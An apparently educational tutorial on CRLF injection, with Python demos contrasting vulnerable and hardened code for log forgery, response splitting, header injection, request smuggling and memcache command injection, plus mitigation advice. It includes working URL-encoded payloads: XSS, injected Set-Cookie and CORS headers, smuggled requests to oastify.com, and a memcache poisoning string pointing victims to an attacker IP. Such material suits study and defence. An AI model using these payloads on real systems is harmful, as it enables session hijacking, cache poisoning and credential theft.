CRLF (%0D%0A) Injection
Carriage Return (CR) and Line Feed (LF), together known as CRLF, are a special character sequence used in the HTTP protocol to mark the end of a line and the start of a new one. Web servers and browsers use CRLF to separate HTTP headers from each other and, with an empty line (CRLF CRLF), to separate the headers from the response body. These characters are used in HTTP/1.1 communication by every kind of web server, such as Apache and Microsoft IIS.
CRLF injection consists of inserting CR and LF characters into user-supplied input. This tricks the server, the application or the user into interpreting the injected sequence as the end of one line or message and the start of another. Although the characters themselves are harmless, their misuse can lead to HTTP response splitting and other malicious activity.
Consider a log file in an admin panel that follows the format: IP - Time - Visited Path. A normal entry records the client's IP address, the time of the request and the requested path on a single line.
An attacker can use CRLF injection to manipulate this log. By including CRLF characters in the HTTP request, the attacker breaks the output flow and fabricates log entries. For example, a request for /index.php?page=home whose query string continues with %0d%0a (the URL-encoded forms of CR and LF) followed by a forged entry that attributes /index.php?page=home&restrictedaction=edit to 127.0.0.1 is written to the log as two lines: the genuine request, and a forged entry in which localhost (an entity typically trusted within the server environment) appears to have performed the restricted action.
The attacker thus cloaks their malicious activity by making it look as if localhost performed it. The server parses the part of the query string that starts with %0d%0a as a single parameter, while the restrictedaction parameter contained in the forged portion is parsed as another, separate input. The manipulated query therefore carries what looks like a legitimate administrative command: /index.php?page=home&restrictedaction=edit.
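The log forgery described above, as an added example that is not code from the original page: a naive logger writes the decoded request path straight into an "IP - Time - Visited Path" file, a hardened logger re-encodes control characters, and a small parser shows what an admin panel would reconstruct from each. The client IP, the time and the attacker's path are constructed sample data; the function and constant names are assumptions.

```python
# Added example (not code from the original page): a CRLF in the request path
# forges a second entry in an "IP - Time - Visited Path" access log, and a
# hardened logger keeps one request on one line. IPs, times and paths are
# constructed sample data.
from __future__ import annotations
from urllib.parse import unquote

LOG_FORMAT = "{ip} - {time} - {path}"


def log_entry_naive(ip: str, time: str, path: str) -> str:
    """Vulnerable: the decoded request path is written to the log unchanged."""
    return LOG_FORMAT.format(ip=ip, time=time, path=path) + "\n"


def sanitize_log_field(value: str) -> str:
    """Hardened: re-encode CR, LF and every other control character so that a
    single request can never produce more than one log line."""
    return "".join(f"%{ord(c):02X}" if ord(c) < 0x20 or c == "\x7f" else c
                   for c in value)


def log_entry_safe(ip: str, time: str, path: str) -> str:
    return LOG_FORMAT.format(ip=ip, time=time,
                             path=sanitize_log_field(path)) + "\n"


def parse_log(text: str) -> list[tuple[str, str, str]]:
    """Reconstruct entries the way an admin panel or a SIEM would read the file."""
    entries = []
    for line in text.splitlines():
        if line.strip():
            ip, time, path = line.split(" - ", 2)
            entries.append((ip, time, path))
    return entries


# Constructed attacker request: a normal page request, then %0d%0a and a forged
# entry that attributes the restricted action to 127.0.0.1 (localhost).
ATTACKER_PATH = ("/index.php?page=home&%0d%0a"
                 "127.0.0.1 - 08:15 - /index.php?page=home&restrictedaction=edit")


def demo(raw_path: str = ATTACKER_PATH) -> dict[str, list[tuple[str, str, str]]]:
    path = unquote(raw_path)  # web servers normally log the decoded path
    naive = log_entry_naive("203.0.113.5", "08:15", path)
    safe = log_entry_safe("203.0.113.5", "08:15", path)
    return {"naive": parse_log(naive), "safe": parse_log(safe)}


if __name__ == "__main__":
    for logger, entries in demo().items():
        print(logger)
        for entry in entries:
            print("  ", entry)
```

The naive logger yields two entries, the second attributed to 127.0.0.1; the hardened logger yields one entry for 203.0.113.5 whose path still visibly contains the %0D%0A, so the attempt is preserved as evidence instead of being executed by the log format.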
HTTP Response Splitting is a security vulnerability that arises when an attacker exploits the structure of HTTP responses. That structure separates header lines, and the headers from the body, using a specific character sequence, Carriage Return (CR) followed by Line Feed (LF), together called CRLF. If an attacker can insert a CRLF sequence into a response header, they can effectively control the content of the rest of the response. This kind of manipulation can lead to serious security issues, notably Cross-site Scripting (XSS).
The application sets a custom header like this: X-Custom-Header: UserInput
The application takes the value UserInput from a query parameter, say user_input. Without proper input validation and encoding, an attacker can craft a payload that contains a CRLF sequence followed by malicious content.
The attacker builds a URL with a specially crafted user_input: ?user_input=Value%0d%0a%0d%0a<script>alert('XSS')</script>
In this URL, %0d%0a%0d%0a is the URL-encoded form of CRLFCRLF, that is, an empty line. It tricks the server into emitting the CRLF sequences, which makes the client treat everything that follows as the response body.
The server reflects the attacker's input in the response header, producing an unintended response structure in which the malicious script is interpreted by the browser as part of the response body.
Another example, showing both the request the browser sends and the headers the server responds with, is at https://www.acunetix.com/websitesecurity/crlf-injection/.
You can also send the payload inside the URL path to control the response from the server (example from the linked source).
More examples are available in the linked resources.
HTTP Header Injection, most often carried out through CRLF (Carriage Return and Line Feed) injection, lets attackers insert HTTP headers of their choosing. This can undermine security mechanisms such as XSS filters or the Same-Origin Policy (SOP), which in turn can lead to unauthorised access to sensitive data, such as CSRF tokens, or to the manipulation of user sessions through cookie planting.
An attacker can inject HTTP headers that enable CORS (Cross-Origin Resource Sharing), bypassing the restrictions imposed by the SOP. This lets scripts from a malicious origin interact with resources of a different origin and read data that should have been protected.
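The response splitting and header injection described in the two passages above, as one added example that is not code from the original page: a handler that reflects the user_input query parameter into X-Custom-Header without validation, a hardened variant that rejects control characters, and a minimal HTTP/1.1 response parser showing what a browser would make of the result. The XSS payload is the one from the text; the Set-Cookie and Access-Control-Allow-Origin payloads, the handler and the parser are constructed for illustration.

```python
# Added example (not code from the original page): a handler that reflects a
# query parameter into X-Custom-Header without validation, a hardened variant,
# and a minimal HTTP/1.1 response parser showing what the browser sees.
# The payloads are constructed; the handler and parser are illustrative only.
from __future__ import annotations
from urllib.parse import unquote

CRLF = "\r\n"
PAGE = "<html>normal page</html>"


def build_response_vulnerable(user_input: str) -> bytes:
    """Vulnerable: the decoded ?user_input= value is placed in a header line."""
    head = ("HTTP/1.1 200 OK" + CRLF
            + "Content-Type: text/html" + CRLF
            + f"X-Custom-Header: {user_input}" + CRLF
            + CRLF)
    return (head + PAGE).encode("latin-1")


def header_value_safe(value: str) -> str:
    """Hardened: reject CR, LF and every other control character outright
    (rejecting is easier to reason about than encoding)."""
    if any(ord(c) < 0x20 or c == "\x7f" for c in value):
        raise ValueError("control characters are not allowed in header values")
    return value


def build_response_safe(user_input: str) -> bytes:
    return build_response_vulnerable(header_value_safe(user_input))


def parse_response(raw: bytes) -> tuple[str, dict[str, str], str]:
    """Split one response into status line, headers and body the way a client
    does: the header block ends at the first empty line (CRLF CRLF)."""
    text = raw.decode("latin-1")
    head, _, body = text.partition(CRLF + CRLF)
    lines = head.split(CRLF)
    headers: dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


# Constructed payloads as they would appear URL-encoded in ?user_input=...
XSS_PAYLOAD = "Value%0d%0a%0d%0a<script>alert('XSS')</script>"
COOKIE_PAYLOAD = "Value%0d%0aSet-Cookie:%20session=attacker-chosen"
CORS_PAYLOAD = "Value%0d%0aAccess-Control-Allow-Origin:%20https://attacker.example"


def reflect(payload: str) -> tuple[str, dict[str, str], str]:
    """What the browser sees when the vulnerable handler reflects `payload`."""
    return parse_response(build_response_vulnerable(unquote(payload)))


if __name__ == "__main__":
    for name, payload in [("xss", XSS_PAYLOAD), ("cookie", COOKIE_PAYLOAD),
                          ("cors", CORS_PAYLOAD)]:
        status, headers, body = reflect(payload)
        print(name, status, headers, repr(body[:40]))
```

With the XSS payload the parsed body starts with the injected script and the original page content is pushed after it; with the other two payloads the injected Set-Cookie and Access-Control-Allow-Origin lines show up as ordinary response headers. The hardened builder raises on the first CR it sees, so none of the three payloads ever reaches the wire.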
CRLF injection can also be used to craft and inject a completely new HTTP request. A well-known example is a vulnerability in PHP's SoapClient class, specifically in its user_agent parameter. By manipulating this parameter, an attacker could insert additional headers and body content, or even inject an entirely new HTTP request. A PHP example of this exploit, together with more details on the technique and the problems it can cause, is in the original source.
You can inject the headers needed to make the back-end keep the connection open after it has answered the initial request (Connection: keep-alive), after which a second request can be specified. This scenario is closely related to HTTP request smuggling: whatever extra headers or body bytes the vulnerable component appends after the injection point become part of the smuggled request, which can lead to various security exploits.
Exploitation:
Malicious Prefix Injection: This method involves poisoning the next user's request or a web cache by specifying a malicious prefix. An example of this is:
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0a%0d%0aContent-Length:%2050%0d%0a%0d%0a HTTP/1.1
Crafting a Prefix for Response Queue Poisoning: This approach involves creating a prefix that, when combined with trailing junk, forms a complete second request. This can trigger response queue poisoning. An example is:
GET /%20HTTP/1.1%0d%0aHost:%20redacted.net%0d%0aConnection:%20keep-alive%0d%0a%0d%0aGET%20/%20HTTP/1.1%0d%0aFoo:%20bar HTTP/1.1
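The request injection of the SoapClient-style user_agent case and the "prefix plus trailing junk" technique of the last two payloads, as one added example that is not PHP's SoapClient and not the original writeup's code: a client helper that interpolates a caller-supplied User-Agent without checks and then appends its own Content-Length line, a hardened variant, and a server-side splitter that reads the resulting byte stream the way a keep-alive back-end does. The hosts redacted.net and oastify.com and the path /redirplz are taken from the payloads above; the /api path, the helper and the parser are assumptions.

```python
# Added example (not PHP's SoapClient and not the original writeup's code):
# a client helper that drops a caller-supplied user_agent into the request
# headers unchecked, a hardened variant, and a server-side splitter showing
# that one outbound request becomes two requests on the back-end connection.
# Hosts and paths come from the payloads on the page; everything else is assumed.
from __future__ import annotations
from urllib.parse import unquote

CRLF = "\r\n"


def build_request_vulnerable(method: str, path: str, host: str,
                             user_agent: str, body: str = "") -> bytes:
    """Vulnerable: user_agent is interpolated without rejecting CR/LF. Note the
    Content-Length line the helper appends AFTER the user-controlled header."""
    head = (f"{method} {path} HTTP/1.1" + CRLF
            + f"Host: {host}" + CRLF
            + f"User-Agent: {user_agent}" + CRLF
            + f"Content-Length: {len(body.encode('latin-1'))}" + CRLF
            + CRLF)
    return (head + body).encode("latin-1")


def build_request_safe(method: str, path: str, host: str,
                       user_agent: str, body: str = "") -> bytes:
    """Hardened: refuse control characters in any caller-supplied header value."""
    if any(ord(c) < 0x20 or c == "\x7f" for c in user_agent):
        raise ValueError("control characters are not allowed in User-Agent")
    return build_request_vulnerable(method, path, host, user_agent, body)


def split_requests(raw: bytes) -> list[dict]:
    """Read a keep-alive stream the way a back-end does: request line, headers
    up to the first empty line, then Content-Length bytes of body; repeat."""
    data = raw.decode("latin-1")
    requests: list[dict] = []
    while data.strip():
        head, sep, rest = data.partition(CRLF + CRLF)
        if not sep:
            break  # incomplete request: a real server would wait for more bytes
        lines = head.lstrip(CRLF).split(CRLF)
        method, path, version = lines[0].split(" ", 2)
        headers: dict[str, str] = {}
        for line in lines[1:]:
            name, _, value = line.partition(":")
            headers[name.strip().lower()] = value.strip()
        length = int(headers.get("content-length", "0"))
        body, data = rest[:length], rest[length:]
        requests.append({"method": method, "path": path, "version": version,
                         "headers": headers, "body": body})
    return requests


# Constructed payload for the user_agent parameter, URL-encoded as on the page:
# end the first request with CRLF CRLF, start a second one, and leave its
# header block open so the helper's own Content-Length line lands inside it.
UA_PAYLOAD = ("IGNORE%0d%0a%0d%0a"
              "GET%20/redirplz%20HTTP/1.1%0d%0aHost:%20oastify.com%0d%0aFoo:%20bar")


def demo(ua_payload: str = UA_PAYLOAD) -> list[dict]:
    raw = build_request_vulnerable("GET", "/api", "redacted.net", unquote(ua_payload))
    return split_requests(raw)


if __name__ == "__main__":
    for req in demo():
        print(req["method"], req["path"], req["headers"])
```

The back-end sees two requests: the legitimate GET /api for redacted.net, and a GET /redirplz for oastify.com whose header block has swallowed the Content-Length line the helper meant for the first request. That is exactly the "trailing junk completes the second request" effect, and it is why the injected prefix does not need to end with its own CRLF CRLF.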
Memcache is a key-value store that uses a clear-text protocol. More information on the protocol is in the linked memcache page.
For the full details, read the original writeup.
If a platform takes data from an HTTP request and uses it, without sanitising it, to send requests to a memcache server, an attacker can abuse this behaviour to inject new memcache commands.
For example, in the originally discovered vulnerability, cache keys were used to return the IP and port a user should connect to, and attackers were able to inject memcache commands that poisoned the cache so that victims' details (usernames and passwords included) were sent to attacker-controlled servers.
Moreover, the researchers also found that they could desync the memcache responses in order to send the attacker's IP and port to users whose e-mail address the attacker did not know.
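The cache-poisoning path described above, as an added example that is not the original writeup's code: a connect-info lookup that builds a memcache "get" from an unsanitised key, a parser for the commands memcached actually reads off the connection, a toy store to show the poisoned result, and a key check that enforces the text protocol's own rules (printable, no whitespace, at most 250 bytes). The "conn:<email>" key scheme, the e-mail addresses and the IP:port values are constructed; the response desync variant is not demonstrated.

```python
# Added example (not the original writeup's code): a connect-info lookup that
# builds a memcache "get" from an unsanitised key, a parser for the commands
# the memcached server actually reads, a toy store to show the poisoned
# result, and a key check per the text protocol. Keys, addresses and the
# key scheme are constructed.
from __future__ import annotations
import re
from urllib.parse import unquote

CRLF = "\r\n"
# memcache text-protocol keys: printable, non-whitespace, at most 250 bytes
KEY_RE = re.compile(r"[\x21-\x7e]{1,250}")
STORAGE_CMDS = {"set", "add", "replace", "append", "prepend"}


def build_get_vulnerable(key: str) -> bytes:
    """Vulnerable: user-controlled key interpolated into the text protocol."""
    return f"get {key}{CRLF}".encode("latin-1")


def build_get_safe(key: str) -> bytes:
    """Hardened: only accept keys the protocol itself allows."""
    if not KEY_RE.fullmatch(key):
        raise ValueError("invalid memcache key")
    return build_get_vulnerable(key)


def parse_commands(raw: bytes) -> list[dict]:
    """Split a client stream into commands the way memcached reads it: one
    line per command, plus a <bytes>-long data block for storage commands."""
    data = raw.decode("latin-1")
    cmds: list[dict] = []
    while data:
        line, sep, data = data.partition(CRLF)
        if not sep:
            break
        parts = line.split()
        if not parts:
            continue
        cmd = {"cmd": parts[0], "args": parts[1:]}
        if parts[0] in STORAGE_CMDS:
            nbytes = int(parts[4])  # set <key> <flags> <exptime> <bytes>
            cmd["data"], data = data[:nbytes], data[nbytes + len(CRLF):]
        cmds.append(cmd)
    return cmds


def apply_commands(cmds: list[dict], store: dict[str, str]) -> list[str]:
    """Toy memcached: execute parsed commands against `store`."""
    out = []
    for c in cmds:
        if c["cmd"] == "get":
            out.append(store.get(c["args"][0], "END"))
        elif c["cmd"] == "set":
            store[c["args"][0]] = c["data"]
            out.append("STORED")
    return out


# Constructed: the app looks up "conn:<email>" to tell a client where to
# connect. The attacker's "email" smuggles a set that overwrites the victim's
# entry with the attacker's listener (17 bytes of data).
ATTACKER_EMAIL = ("attacker@example.com%0d%0a"
                  "set%20conn:victim@example.com%200%200%2017%0d%0a"
                  "198.51.100.7:4444")


def demo() -> dict[str, object]:
    store = {"conn:victim@example.com": "203.0.113.10:993"}
    raw = build_get_vulnerable("conn:" + unquote(ATTACKER_EMAIL))
    cmds = parse_commands(raw)
    apply_commands(cmds, store)
    return {"commands": [c["cmd"] for c in cmds],
            "victim_now_connects_to": store["conn:victim@example.com"]}


if __name__ == "__main__":
    print(demo())
```

One lookup by the attacker turns into a get followed by a set, and the next victim who asks where to connect is handed 198.51.100.7:4444. The check in build_get_safe is the fix: a key that contains whitespace or a control character can never be a valid memcache key, so it is rejected before it reaches the socket.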
To mitigate the risk of CRLF (Carriage Return and Line Feed) or HTTP header injection in web applications, the following strategies are recommended:
Avoid direct user input in response headers: the safest approach is not to place user-supplied input directly in response headers at all.
Encode special characters: if user input cannot be kept out of headers, use a function designed to encode (or reject) special characters such as CR (Carriage Return) and LF (Line Feed). This removes the possibility of CRLF injection.
Update the programming language: keep the language used for your web applications at the latest version, and choose a version whose HTTP header-setting functions refuse to insert CR and LF characters.